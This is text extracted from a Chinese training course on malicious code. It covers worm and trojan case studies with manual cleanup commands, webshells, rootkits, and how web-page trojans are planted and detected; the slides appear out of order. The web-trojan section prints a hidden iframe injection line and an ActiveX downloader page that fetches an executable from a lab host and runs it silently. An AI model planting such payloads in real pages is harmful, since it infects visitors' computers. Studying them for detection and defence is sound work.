恶意代码
- 格式:pdf
- 大小:5.10 MB
- 文档页数:80
网马就是通过利用IE游览器0day 来将木马和html进行结合。如用 户去访问这个html地址,就会在后台自动下载,安装,运行等等 网马最常见的为html网马,JPG网马等等。
特征 控制和恶意盗取信息。
恶意代码概述
Webshell讲解 定义 Web 就是网站服务,shell就是权限。Webshell就是一种恶意的后门 程序。 功能
案例1- 熊猫烧香病毒
重启以后我们要仔细的检查下是否有有感染和隐藏的文件 我们进入cmd 在任意盘符下面输入:dir /ah
案例1- 熊猫烧香病毒
会发现还有隐藏的 病毒文件,那么我就要去手工清除这些隐藏的病毒 进程文件。 我们在cmd 下运行:
attrib -r -h -s autorun.inf attrib -r -h -s setup.exe
恶意代码
课程简介
本课程主要讲解了恶意代码几种类型的原理模式 恶意代码的原理和查杀,以及对系统的影响危害。 通过几个案例可以手工判断和查杀恶意代码。 恶意代码的常见状况与防御。
课程目录
恶意代码概述 恶意代码案例 恶意代码防御
恶意代码概述
病毒的危害解析 定义 计算机病毒是一个具有破坏性,感染性的一种恶意程序。 功能 中毒后会对计算机大量的同类型文件进行破坏,感染 常见的病毒有:熊猫,小浩,维金蠕虫病毒等。
案例3- 网马原理和免杀解析
挂马技术
挂马就是黑客利用各种手段获得网站权限后,通过网页后门修改 网站页面的内容,向页面中加入恶意转向代码,当我们访问被加 入多恶意代码多页面时候,就会自动的访问被转向的地址或者下 载木马病毒恶意程序等等。
案例3- 网马原理和免杀解析
Iframe挂马法:
<iframe src=http: ///muma.html width=0 height=0></iframe>
案例3- 网马原理和免杀解析
网马需要用到的工具和防范
网马生成器 远程控制软件 防范于做过免杀的木马
案例3- 网马原理和免杀解析
网马生成器
案例3- 网马原理和免杀解析
网马生成器
<html></script></body><BODY><OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://192.168.0.8:8080/kent.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>
本案以曾经很流行的知名度病毒 熊猫烧香为案列 为大家详细讲解病 毒的行为 以及手工是查杀方案。
案例1- 熊猫烧香病毒
运行样本后的特征
任务管理器打不开,无法加载任务管理器,
案例1- 熊猫烧香病毒
查系统内存-排查可疑进程 在cmd下输入命令tasklist /svc 来查看进程
案例1- 熊猫烧香病毒
案例1- 熊猫烧香病毒
去除后我们用 del /f 来进行删除掉
案例2-QQ 巨盗木马分析
QQ巨盗木马分析
大小:94KB 很经典的一款盗取QQ的木马。
案例2-QQ 巨盗木马分析
运行样本后,3 款反Rootkit软件中的,冰刃打不开
案例2-QQ 巨盗木马分析
查看进程,发现有3 个可疑进程。 我们在任务管理器结束掉,在结束掉任意一个的时候会发现。
我们也可以理解为潜伏在你的系统中一个包含很多程序功能,比如: 清 楚日志,添加用户等等后门程序。 当然,rootkit还有一些隐藏的进程,文件端口等等,开发者是利用一 些办法不被发现。
恶意代码的概述
恶意代码的辨别 现在最常见恶意文件类型有:exe、dll、inf、cur、vbs、bat。大部分 exe是主文件程序,部分软件需要用exe程序调用才能运行。 如何辨别恶意文件
黑客在入侵网站后,为了下次能再次进入到网站序的后门。会 执行多种功能。比如:目录查看,端口扫描,下载,执行等等一 系列操作。且隐蔽性很深。不易察觉症状。
恶意代码概述
Rootkit后门和查杀 Rootkit 历史已经很悠久了,存在于windows,linux 中。 root 英文的意思就是扎根。Kit就是包的意思。
病毒名称: 武汉男生,又名熊猫烧香病毒。”Worm.WhBoy.h “ 样本说明 大小:59KB 变异版 MD5: 87551e33d517442424e586d25a9f8522 SHA-1:cbbab396803685d5de593259c9b2fe4b0d967bc7
案例1- 熊猫烧香病毒
在排查中,我们发现一个可疑进程:Spoclsv.exe 通过后面的参数,我们更确定的是否是病毒文件。
案例1- 熊猫烧香病毒
查找进程可疑程序
案例1- 熊猫烧香病毒
确定病毒后,我们想要结束这个进程。 在cmd下 taskkill /f /im PID 来结束进程
案例1- 熊猫烧香病毒
查启动项 -> 删除病毒启动项。 在开始-运行-msconfig-启动项中我们可以看到恶意病毒的位置和注册 表的信息
案例2-QQ 巨盗木马分析
在Autoruns —Image Hijacks下载删除所有的镜像劫持文件
案例2-QQ 巨盗木马分析
最后我们要检查各个盘符下的隐藏病毒文件,删除后重启系统。
OSO.exe Autorun.inf
案例3- 网马原理和免杀解析
定义
相信很多人之前只知道网马,但是不知道网马是怎么形成的。 知道网马是通过IE 漏洞,但是不知道怎么做的。 虽然现在网马可利用的漏洞少了,但是还是有个别很多电脑防护 不安全下,使得用户有机会可成变成别人的肉鸡。
Web= 网页,网站。Shell=后门,网站后门。 我们渗透到时候会通过各种手段拿到webshell 也就是成功一半了。
如何分辨和防护挂马:
如果发现打开网站很卡,加载程序,要检查下源码顶部或者底部 在源码里搜索iframe,大多数网马都是这个框架写的,个别除外。 一般来说,被植入恶意病毒有3种原因:网站代码、恶意入侵、病 毒导致。及时查找和保证网站程序更新漏洞补丁。 经常检查网站目录有没有未知文件,注意文件后面的更改日期。 安装杀毒防护软件,和ARP防火墙,有时候局域网ARP攻击,这样 会导致全部服务器被挂马。
案例1- 熊猫烧香病毒
然后我们要记下病毒的位置-C:\windows\system32\drivers\spoclsv.exe HKCU\SOFTWAER\Microsoft\windows\Current\Verstion\RUN 这个病毒的启动项信息,这个病毒的名称是svchare 。
案例1- 熊猫烧香病毒
症状
发现电脑缓慢。文件异常,用杀毒检测出200以上同类型的文件。 可判定为蠕虫病毒。 安全软件英文提示为:Worm。 特征 感染(破坏)系统文件。
恶意代码概述
木马的原理和解析 定义
木马是现在大多用户最常见到一种恶意程序,和病毒程序相比 没有感染性(特殊木马除外)主要是破坏,监听,盗取用户的
文件名无规则异常的 字母数字纯组合的
如:svchost 同名字却在其他系统位置
课程目录
恶意代码概述 恶意代码案例 恶意代码防御
恶意代码案例
案例1-熊猫烧香病毒分析 案例2-QQ巨盗木马分析 案例3-网马的解析和免杀 案例4-Webshell讲解
案例5-Rootkit 后门与查杀
案例1- 熊猫烧香病毒
案例3- 网马原理和免杀解析